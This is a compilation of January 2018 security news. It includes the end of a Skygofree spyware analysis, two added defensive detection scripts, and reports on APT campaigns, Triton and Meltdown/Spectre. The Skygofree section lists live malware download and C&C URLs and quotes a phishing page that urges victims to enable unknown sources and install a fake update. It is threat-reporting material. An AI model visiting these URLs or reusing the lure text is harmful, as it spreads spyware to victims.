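The database schema and the path/filename table above are enough to write a host triage check. The following Python script is an added example, not part of the Kaspersky write-up and not code taken from the implant: it looks inside a user profile for the myupd_tmp\mng.db sqlite database with the MANAGE table (columns ID, Send, Keylogg, Screenshot, Audio) and for files in the per-module directories whose names match the timestamp formats listed. The sample profile it builds is constructed for the demo; the "suspicious" scoring rule is my own choice, and the script deliberately checks only paths, schema and names (it does not verify the hidden attribute or the Run key, which would need Windows-specific APIs).

```python
"""
Added example: triage a Windows user profile (APPDATA) for the on-disk artifacts
attributed to the Skygofree Windows implant in the write-up above.

Checked, using only details given in the text:
  - the sqlite database myupd_tmp\\mng.db with a MANAGE table and the columns
    ID, Send, Keylogg, Screenshot, Audio,
  - the per-module directories and timestamped file names
    (%Y%m%d-%H%M%S -> 8 digits, '-', 6 digits; %d%m%Y%H%M%S / yyyyMMddHHmmss -> 14 digits).
The sample profile produced by build_sample_profile() is constructed demo data.
"""
import os
import re
import sqlite3
import tempfile

# Module label -> (directory below APPDATA, file name pattern), taken from the table in the text.
ARTIFACT_PATTERNS = {
    "msconf.exe (filesystem dump)": (os.path.join("myupd", "gen"), re.compile(r"^\d{8}-\d{6}_filesystem\.zip$")),
    "system.exe (audio)": (os.path.join("myupd", "aud"), re.compile(r"^\d{14}\.wav$")),
    "update.exe (keylog)": (os.path.join("myupd", "txt"), re.compile(r"^\d{8}-\d{6}\.txt$")),
    "update.exe (keylog, temp)": (os.path.join("myupd_tmp", "txt"), re.compile(r"^\d{8}-\d{6}\.txt$")),
    "wow.exe (screenshots)": (os.path.join("myupd", "scr"), re.compile(r"^\d{8}-\d{6}\.jpg$")),
    "skype_sync2.exe (calls)": (os.path.join("myupd", "skype"), re.compile(r"^\d{14}_(in|out)\.mp3$")),
    "skype_sync2.exe (calls, temp)": (os.path.join("myupd_tmp", "skype"), re.compile(r"^\d{14}_(in|out)\.mp3$")),
}

MANAGE_COLUMNS = {"ID", "Send", "Keylogg", "Screenshot", "Audio"}


def check_manage_db(appdata):
    """True if myupd_tmp\\mng.db exists and carries the MANAGE table described in the text."""
    db_path = os.path.join(appdata, "myupd_tmp", "mng.db")
    if not os.path.isfile(db_path):
        return False
    try:
        con = sqlite3.connect(db_path)
        cols = {row[1] for row in con.execute("PRAGMA table_info(MANAGE)")}  # row[1] is the column name
        con.close()
    except sqlite3.DatabaseError:
        return False
    return MANAGE_COLUMNS.issubset(cols)


def find_exfil_files(appdata):
    """Return {module_label: [matching file names]} for every artifact directory that exists."""
    hits = {}
    for label, (subdir, pattern) in ARTIFACT_PATTERNS.items():
        directory = os.path.join(appdata, subdir)
        if not os.path.isdir(directory):
            continue
        matches = sorted(name for name in os.listdir(directory) if pattern.match(name))
        if matches:
            hits[label] = matches
    return hits


def triage(appdata):
    """Scoring rule (my assumption): the control DB alone, or two or more populated exfil
    directories, is treated as a strong indicator."""
    db = check_manage_db(appdata)
    files = find_exfil_files(appdata)
    return {"manage_db": db, "exfil_files": files, "suspicious": db or len(files) >= 2}


def build_sample_profile():
    """Constructed sample APPDATA tree reproducing the described layout (demo data, not a capture)."""
    root = tempfile.mkdtemp(prefix="appdata_")
    os.makedirs(os.path.join(root, "myupd_tmp"))
    con = sqlite3.connect(os.path.join(root, "myupd_tmp", "mng.db"))
    con.execute("CREATE TABLE MANAGE(ID INT PRIMARY KEY NOT NULL,Send INT NOT NULL, "
                "Keylogg INT NOT NULL,Screenshot INT NOT NULL,Audio INT NOT NULL)")
    con.execute("INSERT INTO MANAGE (ID,Send,Keylogg,Screenshot,Audio) VALUES (1, 1, 1, 1, 0)")
    con.commit()
    con.close()
    samples = {
        os.path.join("myupd", "scr"): ["20180130-101500.jpg", "thumbs.db"],   # thumbs.db must not match
        os.path.join("myupd", "aud"): ["30012018101500.wav"],
        os.path.join("myupd", "skype"): ["20180130101500_in.mp3", "20180130101500_out.mp3"],
    }
    for subdir, names in samples.items():
        os.makedirs(os.path.join(root, subdir))
        for name in names:
            open(os.path.join(root, subdir, name), "wb").close()
    return root


if __name__ == "__main__":
    print(triage(build_sample_profile()))
```

Run it against a real profile with `triage(os.environ["APPDATA"])`; the file-name patterns are deliberately strict so that unrelated files in a hijacked directory (the thumbs.db in the sample) do not count.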
Moreover, we found one module written in .Net – skype_sync2.exe. The main purpose of this module is to exfiltrate Skype call recordings. Just like the previous modules, it contains multiple strings in Italian.

After launch, it downloads a codec for MP3 encoding directly from the C&C server:

http://54.67.109.199/skype_resource/libmp3lame.dll

The skype_sync2.exe module has a compilation timestamp – Feb 06 2017 and the following PDB string:

\\vmware-host\Shared Folders\dati\Backup\Projects\REcodin_2\REcodin_2\obj\x86\Release\REcodin_2.pdb

network.exe is a module for submitting all exfiltrated data to the server. In the observed version of the implant it doesn’t have an interface to work with the skype_sync2.exe module.

network.exe submitting to the server code snippet

Code similarities
We found some code similarities between the implant for Windows and other public accessible projects.

https://github.com/El3ct71k/Keylogger/
It appears the developers have copied the functional part of the keylogger module from this project.

update.exe module and Keylogger by ‘El3ct71k’ code comparison

Xenotix Python Keylogger including specified mutex ‘mutex_var_xboz’.

update.exe module and Xenotix Python Keylogger code comparison

‘addStartup’ method from msconf.exe module

‘addStartup’ method from Xenotix Python Keylogger

Distribution
We found several landing pages that spread the Android implants.

Malicious URL Referrer Dates
http://217.194.13.133/tre/internet/Configuratore_3.apk http://217.194.13.133/tre/internet/ 2015-02-04 to present time
http://217.194.13.133/appPro_AC.apk – 2015-07-01
http://217.194.13.133/190/configurazione/vodafone/smartphone/VODAFONE%20Configuratore%20v5_4_2.apk http://217.194.13.133/190/configurazione/vodafone/smartphone/index.html 2015-01-20 to present time
http://217.194.13.133/190/configurazione/vodafone/smartphone/Vodafone%20Configuratore.apk http://217.194.13.133/190/configurazione/vodafone/smartphone/index.html currently active
http://vodafoneinfinity.sytes.net/tim/internet/Configuratore_TIM.apk http://vodafoneinfinity.sytes.net/tim/internet/ 2015-03-04
http://vodafoneinfinity.sytes.net/190/configurazione/vodafone/smartphone/VODAFONE%20Configuratore%20v5_4_2.apk http://vodafoneinfinity.sytes.net/190/configurazione/vodafone/smartphone/ 2015-01-14
http://windupdate.serveftp.com/wind/LTE/WIND%20Configuratore%20v5_4_2.apk http://windupdate.serveftp.com/wind/LTE/ 2015-03-31
http://119.network/lte/Internet-TIM-4G-LTE.apk http://119.network/lte/download.html 2015-02-04, 2015-07-20
http://119.network/lte/Configuratore_TIM.apk 2015-07-08
Many of these domains are outdated, but almost all (except one – appPro_AC.apk) samples located on the 217.194.13.133 server are still accessible. All the observed landing pages mimic the mobile operators’ web pages through their domain name and web page content as well.

Landing web pages that mimic the Vodafone and Three mobile operator sites

NETWORK CONFIGURATION
*** UPDATE 2.3.2015 ***
Dear Customer, in order to avoid malfunctions to your internet connection, we encourage you to upgrade your configuration. Download the update now and keep on navigating at maximum speed!
DOWNLOAD NOW
Not sure how to configure your smartphone?
Follow the simple steps below and enter the Vodafone Fast Network.
Installation Guide
Download
Click on the DOWNLOAD button you will find on this page and download the application on your smartphone.
Set your Smartphone
Go to Settings-> Security for your device and put a check mark on Unknown Sources (some models are called Sources Unknown).
Install
Go to notifications on your device (or directly in the Downloads folder) and click Vodafone Configuration Update to install.
Try high speed
Restart your device and wait for confirmation sms. Your smartphone is now configured.

Further research of the attacker’s infrastructure revealed more related mimicking domains.

Unfortunately, for now we cannot say in what environment these landing pages were used in the wild, but according to all the information at our disposal, we can assume that they are well suited to exploitation via malicious redirects or man-in-the-middle attacks. For example, this could happen when the victim’s device connects to a Wi-Fi access point that is infected or controlled by the attackers.

Artifacts
During the research, we found plenty of traces of the developers and those doing the maintaining.

As already stated in the ‘malware features’ part, there are multiple giveaways in the code. Here are just some of them:
ngglobal – FirebaseCloudMessaging topic name
Issuer: CN = negg – from several certificates
negg.ddns[.]net, negg1.ddns[.]net, negg2.ddns[.]net – C&C servers
NG SuperShell – string from the reverse shell payload
ngg – prefix in commands names of the implant for Windows

Signature with specific issuer

Whois records and IP relationships provide many interesting insights as well. There are a lot of other ‘Negg’ mentions in Whois records and references to it. For example:

Conclusions
The Skygofree Android implant is one of the most powerful spyware tools that we have ever seen for this platform. As a result of the long-term development process, there are multiple, exceptional capabilities: usage of multiple exploits for gaining root privileges, a complex payload structure, never-before-seen surveillance features such as recording surrounding audio in specified locations.

Given the many artifacts we discovered in the malware code, as well as infrastructure analysis, we are pretty confident that the developer of the Skygofree implants is an Italian IT company that works on surveillance solutions, just like HackingTeam.

Notes
*Skygofree has no connection to Sky, Sky Go or any other subsidiary of Sky, and does not affect the Sky Go service or app.


AMD, Apple Sued Over CPU Vulnerabilities
19.1.2018 securityweek
Vulnerability
Apple and Advanced Micro Devices (AMD) are also facing class action lawsuits following the disclosure of critical CPU vulnerabilities that affect billions of devices.

The Meltdown and Spectre attack methods, which rely on vulnerabilities that have been around for roughly two decades, allow malicious applications to bypass memory isolation mechanisms and access passwords, photos, documents, emails, and other sensitive data. Attacks can be launched against systems using processors from Intel, AMD, ARM, and others.

Intel was hit the hardest – a majority of its processors are affected and they are the most likely to be targeted in attacks – so it came as no surprise when several class action lawsuits were filed against the company. However, lawsuits were also filed recently against AMD and Apple.

In the case of AMD, the lawsuits focus on the fact that, shortly after the existence of Meltdown and Spectre came to light, the company claimed that the risk of attacks against its customers was “near zero” due to the architecture of its processors. The company later admitted that the two vulnerabilities that allow Spectre attacks do affect its CPUs.

Lawsuits announced by law firms Pomerantz and Rosen allege that AMD “made materially false and/or misleading statements and/or failed to disclose that: (1) a fundamental security flaw in Advanced Micro’s processor chips renders them susceptible to hacking; and (2) as a result, Advanced Micro’s public statements were materially false and misleading at all relevant times.”

The value of AMD shares went up after the company claimed that its products were not affected, but fell by $0.12, or nearly 1%, after the company confirmed on January 11 that its CPUs are in fact vulnerable to Spectre attacks.

Anyone who purchased AMD shares between February 21, 2017, when the company filed an annual report with the SEC, and January 11, 2018, can join the lawsuits.

The complaints point to several SEC filings from this period that allegedly led to AMD shares being artificially and falsely inflated. Plaintiffs claim they would not have acquired AMD stock at prices inflated by misleading statements and withholding information about the vulnerabilities. Google informed vendors of the flaws in June and July 2017.

In the case of Apple, whose processors rely on ARM technology, the complaint says “all Apple processors are defective because they were designed by Defendant Apple in a way that allows hackers and malicious programs potential access to highly secure information stored on iDevices.”

Plaintiffs claim Apple had known about the flaws for a long time, but did not take action until recently. The complaint, filed on January 8, said Apple had not provided any mitigations against Spectre attacks, but the tech giant did release software updates on the same day.

The complaint claims plaintiffs would not have purchased Apple devices or they would not have paid the price they paid had they known about the vulnerabilities.


Dark Caracal APT – Lebanese intelligence is spying on targets for years
19.1.2018 securityaffairs APT

A new long-running player has emerged in the cyber arena: the Dark Caracal APT, a hacking crew associated with the Lebanese General Directorate of General Security that has already conducted many stealthy hacking campaigns.
Cyber spies belonging to the Lebanese General Directorate of General Security are behind a number of stealthy hacking campaigns that, over the last six years, aimed to steal text messages, call logs, and files from journalists, military staff, corporations, and other targets in 21 countries worldwide.

New nation-state actors continue to improve offensive cyber capabilities and almost any state-sponsored group is able to conduct widespread multi-platform cyber-espionage campaigns.

This discovery confirms that the barrier to entry in the cyber-warfare arena has continued to decrease and new players are becoming even more dangerous.

The news was reported in a detailed joint report published by security firm Lookout and digital civil rights group the Electronic Frontier Foundation.

The APT group was tracked as Dark Caracal by the researchers, its campaigns leverage a custom Android malware included in fake versions of secure messaging apps like Signal and WhatsApp.
“Lookout and Electronic Frontier Foundation (EFF) have discovered Dark Caracal, a persistent and prolific actor, who at the time of writing is believed to be administered out of a building belonging to the Lebanese General Security Directorate in Beirut. At present, we have knowledge of hundreds of gigabytes of exfiltrated data, in 21+ countries, across thousands of victims. Stolen data includes enterprise intellectual property and personally identifiable information.” states the report.
The attack chain implemented by Dark Caracal relies primarily on social engineering: the hackers delivered messages to victims through a Facebook group and via WhatsApp. At a high level, three different kinds of phishing messages were designed to trick victims into visiting a compromised website, a typical watering hole attack.


The malicious app could exfiltrate text messages, including two-factor authentication codes, and other data from the victim’s device. The Dark Caracal malware is also able to use the device’s cameras and microphone to spy on the victims.

Unfortunately, the APT group also used another powerful surveillance software in its campaign, the malware is the dreaded FinFisher, a spyware that is often marketed to law enforcement and government agencies.

Researchers from Lookout and the EFF discovered a number of test devices that appeared to be located in the Beirut building of the Lebanese General Directorate of General Security, suggesting that the Dark Caracal APT is linked to the government.
“Devices for testing and operating the campaign were traced back to a building belonging to the Lebanese General Directorate of General Security (GDGS), one of Lebanon’s intelligence agencies. Based on the available evidence, it is likely that the GDGS is associated with or directly supporting the actors behind Dark Caracal. ” continues the report.

Dark Caracal also has a Windows malware in its arsenal, the malicious code was able to collect screenshots and files from the infected PCs.


Lookout and the EFF launched their investigation in July 2017, the researchers were able to identify the Command and Control infrastructure and determined that the Dark Caracal hackers were running six unique campaigns. Some of the hacking campaigns had been ongoing for years targeting a large number of targets in many countries, including China, the United States, India, and Russia.

“Since we first gained visibility into attacker infrastructure in July 2017, we have seen millions of requests being made to it from infected devices. This demonstrates that Dark Caracal is likely running upwards of six distinct campaigns in parallel, some of which have been operational since January 2012. Dark Caracal targets a broad range of victims.” states the analysis. “Thus far, we have identified members of the military, government officials, medical practitioners, education professionals, academics, civilians from numerous other fields, and commercial enterprises as targets.”

Further details are provided in the technical report, which includes more than 90 indicators of compromise (IOCs).


Triton Malware Exploited Zero-Day in Schneider Electric Devices
19.1.2018 securityweek
Virus
The recently discovered malware known as Triton and Trisis exploited a zero-day vulnerability in Schneider Electric’s Triconex Safety Instrumented System (SIS) controllers in an attack aimed at a critical infrastructure organization.

The malware, designed to target industrial control systems (ICS), was discovered after it caused a shutdown at an organization in the Middle East. Both FireEye and Dragos published detailed reports on the threat.

Triton is designed to target Schneider Electric Triconex SIS devices, which are used to monitor the state of a process and restore it to a safe state or safely shut it down if parameters indicate a potentially dangerous situation. The malware uses the TriStation proprietary protocol to interact with SIS controllers, including read and write programs and functions.

Schneider initially believed that the malware had not leveraged any vulnerabilities in its product, but the company has now informed customers that Triton did in fact exploit a flaw in older versions of the Triconex Tricon system.

The company says the flaw affects only a small number of older versions and a patch will be released in the coming weeks. Schneider is also working on a tool – expected to become available next month – that detects the presence of the malware on a controller and removes it.

Schneider has highlighted, however, that despite the existence of the vulnerability, the Triton malware would not have worked had the targeted organization followed best practices and implemented security procedures.

Specifically, the Triton malware can only compromise a SIS device if it is set to PROGRAM mode. The vendor recommends against leaving the controller in this mode when it is not actively being configured. Had the targeted critical infrastructure organization applied this recommendation, the malware could not have compromised the device, even with the vulnerability present; Schneider has described the flaw as only one element in a complex attack scenario.

The company noted that its product worked as designed – it shut down systems when it detected a potentially dangerous situation – and no harm was incurred by the customer or their environment.

In its advisory, Schneider also told customers that the malware is capable of scanning and mapping systems.

“The malware has the capability to scan and map the industrial control system to provide reconnaissance and issue commands to Tricon controllers. Once deployed, this type of malware, known as a Remotely Accessible Trojan (RAT), controls a system via a remote network connection as if by physical access,” Schneider said.

The industrial giant has advised customers to always implement the instructions in the “Security Considerations” section of the Triconex documentation. The guide recommends keeping the controllers in locked cabinets and even displaying an alarm whenever they are set to “PROGRAM” mode.

While it’s unclear who is behind the Triton/Trisis attack, researchers agree that the level of sophistication suggests the involvement of a state-sponsored actor. Industrial cybersecurity and threat intelligence firm CyberX believes, based on its analysis of Triton, that the malware was developed by Iran and the targeted organization was in Saudi Arabia.


Russia-Linked Attacks on Political Organizations Continue
19.1.2018 securityweek APT

The cyber-espionage group known as Fancy Bear was highly active in the second half of 2017, hitting political organizations worldwide, Trend Micro said this week.

Also known as APT28, Pawn Storm, Sofacy, Group 74, Sednit, Tsar Team, and Strontium, the group is said to have ties with the Russian government. Since 2015, the group has been associated with attacks on political organizations in France, Germany, Montenegro, Turkey, Ukraine, and the United States.

During the second half of 2017, such attacks continued, without revealing much technical innovation over time. However, the attacks are well prepared, persistent, and often hard to defend against, the security researchers say.

“Pawn Storm has a large toolset full of social engineering tricks, malware and exploits, and therefore doesn’t need much innovation apart from occasionally using their own zero-days and quickly abusing software vulnerabilities shortly after a security patch is released,” Trend Micro points out.

During the second half of 2017, the group was observed targeting organizations with credential phishing and spear phishing attacks. In August and September, the hackers used tabnabbing against Yahoo! users, a method that involves changing a browser tab to point to a phishing site after distracting the target.

In attacks observed in October and November 2017, the group used credential phishing emails to target specific organizations. One incident employed an email claiming to inform the target of an expired password, while the other claimed a new file was present on the company’s OneDrive system.

During the past six months, Pawn Storm also targeted several International Olympic Wintersport Federations, including the European Ice Hockey Federation, the International Ski Federation, the International Biathlon Union, the International Bobsleigh and Skeleton Federation, and the International Luge Federation.

The attacks appear to be related to several Russian Olympic players being banned for life in fall 2017. A recent incident involving the leak of emails exchanged between officials of the International Olympic Committee (IOC) and other individuals involved with the Olympics also appears to be related to the state-sponsored actor.

Some of the group’s political targets included chmail.ir webmail users, who received credential phishing emails on May 18, 2017, one day before the presidential elections in Iran. Similar incidents were observed targeting political organizations globally, Trend Micro says.

In June 2017, the actor set up phishing sites mimicking the ADFS (Active Directory Federation Services) of the U.S. Senate. In attacks observed during fall 2017, the group was abusing Google’s Blogspot service to target Bellingcat, a group of investigative journalists that uses open source information to report on various events taking place around the world.

Individuals interested in the CyCon U.S. conference organized by the NATO Cooperative Cyber Defence Centre of Excellence (CCDCOE) in collaboration with the Army Cyber Institute at West Point were also targeted by Pawn Storm last year.

Moving forward, the group is expected to continue targeting political organizations, while also likely focusing on influencing public opinion via social media, given that social media algorithms are “susceptible to abuse by various actors with bad intentions.”

“Publishing stolen data together with spreading fake news and rumors on social media gives malicious actors powerful tools. While a successful influence campaign might seem relatively easy to do, it needs a lot of planning, persistence, and resources to be successful. Some of the basic tools and services, like ones used to spread fake news on social media, are already being offered as a service in the underground economy,” Trend Micro notes.

Other actors too might start campaigns attempting to influence politics and issues of interest domestically and abroad, the researchers say. Pawn Storm, however, is expected to continue to be highly active, especially with the Olympics and several significant global elections taking place in 2018.


Booby-Trapped Messaging Apps Used for Spying: Researchers
19.1.2018 securityweek Mobil
An espionage campaign using malware-infected messaging apps has been stealing smartphone data from activists, soldiers, lawyers, journalists and others in more than 20 countries, researchers said in a report Thursday.

A report authored by digital rights group Electronic Frontier Foundation and mobile security firm Lookout detailed discovery of "a prolific actor" with nation-state capabilities "exploiting targets globally across multiple platforms."

Desktop computers were also targeted, but getting into data-rich mobile devices was a primary objective, according to the report.

With fake versions of secure messaging services like WhatsApp and Signal, the scheme has enabled attackers to take pictures, capture audio, pinpoint locations, and mine handsets for private data.

EFF and Lookout researchers dubbed the threat "Dark Caracal."

People in the US, Canada, Germany, Lebanon, and France have been hit by Dark Caracal, according to EFF director of cybersecurity Eva Galperin.

"This is a very large, global campaign, focused on mobile devices," Galperin said.

"Mobile is the future of spying, because phones are full of so much data about a person's day-to-day life."

Hundreds of gigabytes of data have been taken from thousands of victims in more than 21 countries, according to Lookout and the EFF.

There were indications that Dark Caracal might be an infrastructure hosting a number of widespread, global cyberespionage campaigns, some of which date back years, the report said.

Because the apps fool people into thinking they are legitimate, users give them access to cameras, microphones and data.

"All Dark Caracal needed was application permissions that users themselves granted when they downloaded the apps, not realizing that they contained malware," said EFF staff technologist Cooper Quintin.

"This research shows it's not difficult to create a strategy allowing people and governments to spy on targets around the world."

Researchers reported that they tracked Dark Caracal to a building in Beirut belonging to the Lebanese General Security Directorate.

Analysis showed that devices of military personnel, businesses, journalists, lawyers, educators, and medical professionals have been compromised, according to the report.

"Not only was Dark Caracal able to cast its net wide, it was also able to gain deep insight into each of the victim's lives," the report concluded.

Cyber security professionals consistently warn people to be wary when downloading software, avoiding programs shared through links or email and instead relying on trusted sources.


Cloudflare Launches Remote Access to Replace Corporate VPNs
19.1.2018 securityweek Security
Mobile and cloud computing have challenged the concept of perimeter security. There is no longer an easily definable perimeter to defend. VPNs are a traditional, but not ideal solution. Neither approach addresses the attacker who gets through the perimeter or into the VPN. Google long ago recognized the problems and introduced BeyondCorp as an alternative to perimeters and VPNs for its own worldwide employees.

BeyondCorp replaces the need for VPNs. Instead it focuses on authenticating the device (which it provides and identifies with a device certificate) and its user, and then imposes tiered authentication around its applications. In effect, it removes the distinction between a trusted network and an untrusted network, and focuses on authenticated access from any location.

It is a good security model, but one that is beyond the reach of companies that don't have Google's resources. Now Cloudflare has announced a new service for its customers that it calls Cloudflare Access and describes as 'democratizing' the BeyondCorp model. It allows employees to operate outside of the corporate network without requiring them to use a VPN, "which," writes Cloudflare engineer Venkat Viswanathan in an associated blog post Wednesday, "slows down work because every page load makes extra round trips to the VPN server. After all this hassle, users on the VPN are still highly susceptible to phishing, man-in-the-middle and SQL injection attacks."

"VPNs are slow, and clunky, and frankly, don't make sense for an increasingly mobile workforce accessing increasingly cloudified apps," said Matthew Prince, co-founder and CEO of Cloudflare. "Cloudflare Access gives centralized application access control for legacy or cloud apps without slowing down connections, regardless of where someone is working around the world."

Unlike BeyondCorp, however, Cloudflare cannot provide corporate devices for the users. Customers remain responsible for the security of the remote devices. "We don't insist on clients providing company devices to employees," Prince told SecurityWeek, "but we recommend that they tick some sort of identity provider. That could be Google, Microsoft Active Directory, Okta or something they've built themselves. How much they use that service and lock down the individual devices is up to them, but we would recommend that they use multi-factor authentication on those devices."

Cloudflare's role in this model is to protect the customer's individual applications within separate authentication wrappers. "While perimeter defense is based on the idea of a moat around the castle," said Prince, "this new model puts each application (the castle's individual crown jewels) into separate safes. We don't care whether the customer uses a combination lock safe, or a physical key safe or an electronic keypad safe. We'll support any of the different mechanisms for unlocking the safe -- but what we provide is the safe itself. We provide the thing that wraps around wherever the crown jewels are located and protects them. It is the customers that decide how they want to verify if the device and user are legitimate and authorized to open the door that we provide."

Cloudflare's Access product does not defend the user's device, but it does defend the company's applications. "Even if an attacker manages to get into a device, every access to the company network is logged by Cloudflare. The customer can monitor for anomalies. So, the model of wrapping authentication around each application not only adds friction to any attack, it also provides a central repository where the security team can look for anomalies, track bad behavior and quickly respond accordingly. The customer's administrator for the Cloudflare service would have a single view of every employee's device -- when it logged into and used each of the different services -- on a service by service basis. If anything anomalous happens, the administrator can withdraw the user's Access instantly."

The logs are accessible through a Cloudflare API, so anomaly detection can be automated using anomaly detection tools in-house. "Over time," said Prince, "as Access matures, there will be additional tools that we provide to allow customers to look for things that might be anomalous. For example, if a device has only logged into three services in its entire history, and then suddenly logs into five new services, we would surface that in the logs and show it to the admins. This is not currently available," he added. "You could build it through our APIs, but it's something we are likely to make available in future versions of our product."
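The heuristic Prince describes, a device that has historically used only a few services suddenly authenticating to several new ones, is easy to build on top of per-application access logs. The following Python script is an added example and not Cloudflare's code: the log line format (timestamp, device id, user, application), the one-hour window, the threshold of five new services and the one-day baseline requirement are all assumptions for the demo, and the log itself is constructed. The baseline requirement handles the cold-start case: a brand-new device enrolling in five applications on its first day is onboarding, not an anomaly.

```python
"""
Added example: detect a "burst of never-before-used services" per device over
per-application access logs, in the spirit of the anomaly described in the text.
Log format, window, threshold and baseline are assumptions; the log is constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: dev-7f3a has a three-service history (wiki, jira, grafana),
# then hits five new applications within a few minutes at 03:00. dev-9c21 is a new device.
SAMPLE_LOG = """\
2018-01-15T09:02:11Z dev-7f3a alice@example.com wiki
2018-01-15T09:40:52Z dev-7f3a alice@example.com jira
2018-01-16T10:11:03Z dev-7f3a alice@example.com wiki
2018-01-17T14:27:45Z dev-7f3a alice@example.com grafana
2018-01-18T08:15:00Z dev-7f3a alice@example.com jira
2018-01-19T03:04:10Z dev-7f3a alice@example.com payroll
2018-01-19T03:05:41Z dev-7f3a alice@example.com hr-portal
2018-01-19T03:06:02Z dev-7f3a alice@example.com vault
2018-01-19T03:07:30Z dev-7f3a alice@example.com git
2018-01-19T03:09:12Z dev-7f3a alice@example.com admin-console
2018-01-19T09:00:00Z dev-9c21 bob@example.com wiki
2018-01-19T09:01:00Z dev-9c21 bob@example.com jira
"""


def parse_log(text):
    """Parse 'timestamp device user application' lines into (datetime, device, user, app) tuples."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, device, user, app = line.split()
        records.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), device, user, app))
    return records


def new_service_bursts(records, window=timedelta(hours=1), threshold=5, baseline=timedelta(days=1)):
    """
    Return alerts as (device, user, burst_start, [new apps]).
    An alert fires when a device that has been seen for at least `baseline` authenticates,
    within `window`, to at least `threshold` applications it has never used before
    (history = every earlier record for that device). One alert per device.
    """
    records = sorted(records)
    first_seen = {}
    history = defaultdict(set)      # device -> apps seen so far
    recent_new = defaultdict(list)  # device -> [(time, app)] first-time apps inside the window
    alerts, alerted = [], set()
    for ts, device, user, app in records:
        first_seen.setdefault(device, ts)
        if app in history[device]:
            continue                # known service for this device: nothing to do
        history[device].add(app)
        recent_new[device] = [(t, a) for t, a in recent_new[device] if ts - t <= window] + [(ts, app)]
        established = ts - first_seen[device] >= baseline
        if established and len(recent_new[device]) >= threshold and device not in alerted:
            alerts.append((device, user, recent_new[device][0][0], [a for _, a in recent_new[device]]))
            alerted.add(device)
    return alerts


if __name__ == "__main__":
    for device, user, start, apps in new_service_bursts(parse_log(SAMPLE_LOG)):
        print(f"{start.isoformat()} {device} ({user}) new services: {', '.join(apps)}")
```

Because the check keys on the device rather than the user, a stolen session replayed from a fresh device shows up as a new device with no baseline, which this rule deliberately does not score; pair it with a "new device for this user" alert if that case matters.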

Cloudflare's new Access product is a replacement for corporate VPNs using much of Google's BeyondCorp model.

"When a user accesses an individual application," explained Prince, "it would be like passing through a VPN on a per application basis. Users would hit a Cloudflare data center which prompts for proof of identity and authorization to access a particular application. If that authorization proves 'true', then the user gets a fast lane back to the actual application, which could be running anywhere on the internet, whether in-house or a third-party such as Salesforce. The user gets a much faster experience through not having to back haul everything through some centralized VPN server." Like a VPN, all traffic is protected by encryption.

"If you think of the problems that VPNs are trying to solve, they're simply trying to let the good guys in and keep the bad guys out. Access solves that exact same problem, but does it in a way that is more robust. It supports cloud environments, it supports remote workers without slowing down their connection, and it actually provides a better security model where you have individuals being logged as they pass through authentication checkpoints to use each different application."

Cloudflare Access is being sold on a per seat basis: $3 per person, per month. There is no limit to the number of applications that can be accessed by each user via the service. Volume discounts are available for large deployments.

San Francisco, CA-based Cloudflare was founded in 2009. It has raised a total funding amount of $182,050,000 -- the most recent being $110 million Series D funding led by Fidelity Investments in September 2015. It routes traffic through its own global network, blocking DoS attacks, reducing spam and improving performance.


Meltdown and Spectre patches have a variable impact and can cause unwanted reboots, Intel warns
19.1.2018 securityaffairs
Vulnerability

Intel has published the results of the test conducted on the Meltdown and Spectre patches and their impact on performance confirming serious problems.
According to the tech giant systems with several types of processors running Meltdown and Spectre patches may experience more frequent reboots.

A few days ago Intel reported that extensive tests conducted on home and business PCs demonstrated a modest performance impact on these types of systems (from 2% up to 14%).

Now the vendor has conducted some performance tests on data centers and results show that the impact on the performance depends on the system configuration and the workload.

“As expected, our testing results to date show performance impact that ranges depending on specific workloads and configurations. Generally speaking, the workloads that incorporate a larger number of user/kernel privilege changes and spend a significant amount of time in privileged mode will be more adversely impacted.” reads the analysis conducted by Intel.

Impacts ranged from 0% to 2% on industry-standard measures of integer and floating point throughput, Linpack, STREAM, server-side Java and energy efficiency benchmarks. These benchmarks cover typical workloads for enterprise and cloud customers.

Intel also evaluated the impact on online transaction processing (OLTP), estimating it at roughly 4%.

Benchmarks for storage demonstrated a strict dependence on the benchmark, test setup, and system configuration.

For FlexibleIO, which simulates various I/O workloads, throughput performance decreased by 18% when the CPU was stressed, but there was no impact when CPU usage was low.

The FlexibleIO tests were conducted using different benchmarks simulating different types of I/O loads; the results depend on many factors, including read/write mix, block size, drives and CPU utilization.

“For FlexibleIO, a benchmark simulating different types of I/O loads, results depend on many factors, including read/write mix, block size, drives and CPU utilization. When we conducted testing to stress the CPU (100% write case), we saw an 18% decrease in throughput performance because there was not CPU utilization headroom.” continues the analysis. “When we used a 70/30 read/write model, we saw a 2% decrease in throughput performance. When CPU utilization was low (100% read case), as is the case with common storage provisioning, we saw an increase in CPU utilization, but no throughput performance impact.”

The most severe performance degradation was observed during Storage Performance Development Kit (SPDK) tests: using iSCSI, the degradation reached 25% when only a single core was used. Fortunately, there was no performance degradation when SPDK vHost was used.


Intel also reported that the Meltdown and Spectre patches are causing more frequent reboots; this behavior was observed on systems running Broadwell-, Haswell-, Ivy Bridge-, Sandy Bridge-, Skylake-, and Kaby Lake-based platforms.

“We have reproduced these issues internally and are making progress toward identifying the root cause. In parallel, we will be providing beta microcode to vendors for validation by next week,” said Navin Shenoy, executive vice president and general manager of Intel’s Data Center Group.

Only Intel's newest 8th-generation Coffee Lake CPUs appear to be unaffected by the reboots.


North Korea Group 123 involved in at least 6 different hacking campaigns in 2017
19.1.2018 securityaffairs APT

North Korean hackers belonging to the North Korea Group 123 have conducted at least six different massive malware campaigns during 2017.
North Korean hackers have conducted at least six different massive malware campaigns during 2017, most of them against targets in South Korea. Security researchers from Cisco’s Talos group who have monitored the situation for 12 months have identified a North Korean threat actor tracked by the experts as Group 123 that conducted numerous malware attacks against entities in the South.

In three different phishing campaigns, tracked as “Golden Time”, “Evil New Year” and “North Korean Human Rights”, South Korean victims were specifically infected with the ROKRAT Remote Access Trojan.

“On January 2nd of 2018, the “Evil New Year 2018” was started. This campaign copies the approach of the 2017 “Evil New Year” campaign.

The links between the different campaigns include shared code and compiler artifacts such as PDB (Program DataBase) patterns which were present throughout these campaigns.” reads the analysis published by Talos.

“Based on our analysis, the “Golden Time”, both “Evil New Year” and the “North Korean Human Rights” campaigns specifically targeted South Korean users.”

The ROKRAT RAT was used to target Korean targets using the popular Korean Microsoft Word alternative Hangul Word Processor (HWP). In the past, we saw other attacks against people using the HWP application.


